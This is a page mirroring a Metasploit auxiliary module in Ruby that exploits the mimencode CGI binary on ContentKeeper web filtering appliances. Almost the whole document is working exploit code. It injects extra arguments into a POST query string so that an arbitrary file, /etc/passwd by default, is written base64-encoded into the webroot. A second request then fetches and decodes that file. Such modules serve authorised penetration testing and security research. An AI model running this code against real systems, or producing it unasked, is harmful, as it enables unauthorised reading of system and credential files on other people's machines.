Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
include Msf::Auxiliary::Scanner
9
10
def initialize
11
super(
12
'Name' => 'ContentKeeper Web Appliance mimencode File Access',
13
'Description' => %q{
14
This module abuses the 'mimencode' binary present within
15
ContentKeeper Web filtering appliances to retrieve arbitrary
16
files outside of the webroot.
17
},
18
'References' => [
19
[ 'OSVDB', '54551' ],
20
[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
21
],
22
'Author' => [ 'aushack' ],
23
'License' => MSF_LICENSE,
24
'Notes' => {
25
'Stability' => [CRASH_SAFE],
26
'SideEffects' => [IOC_IN_LOGS],
27
'Reliability' => []
28
}
29
)
30
31
register_options(
32
[
33
OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
34
OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),
35
]
36
)
37
end
38
39
def run_host(_ip)
40
tmpfile = Rex::Text.rand_text_alphanumeric(20) # Store the base64 encoded traversal data in a hard-to-brute filename, just in case.
41
42
print_status("Attempting to connect to #{rhost}:#{rport}")
43
res = send_request_raw(
44
{
45
'method' => 'POST',
46
'uri' => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE']
47
}, 25
48
)
49
50
if res && res.code == 500
51
print_good("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")
52
53
file = send_request_raw(
54
{
55
'method' => 'GET',
56
'uri' => '/' + tmpfile
57
}, 25
58
)
59
60
if file && (file.code == 200)
61
print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")
62
elsif file && file.code
63
print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")
64
end
65
elsif res && res.code
66
print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")
67
end
68
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
69
vprint_error(e.message)
70
rescue ::Timeout::Error, ::Errno::EPIPE => e
71
vprint_error(e.message)
72
end
73
end
74
75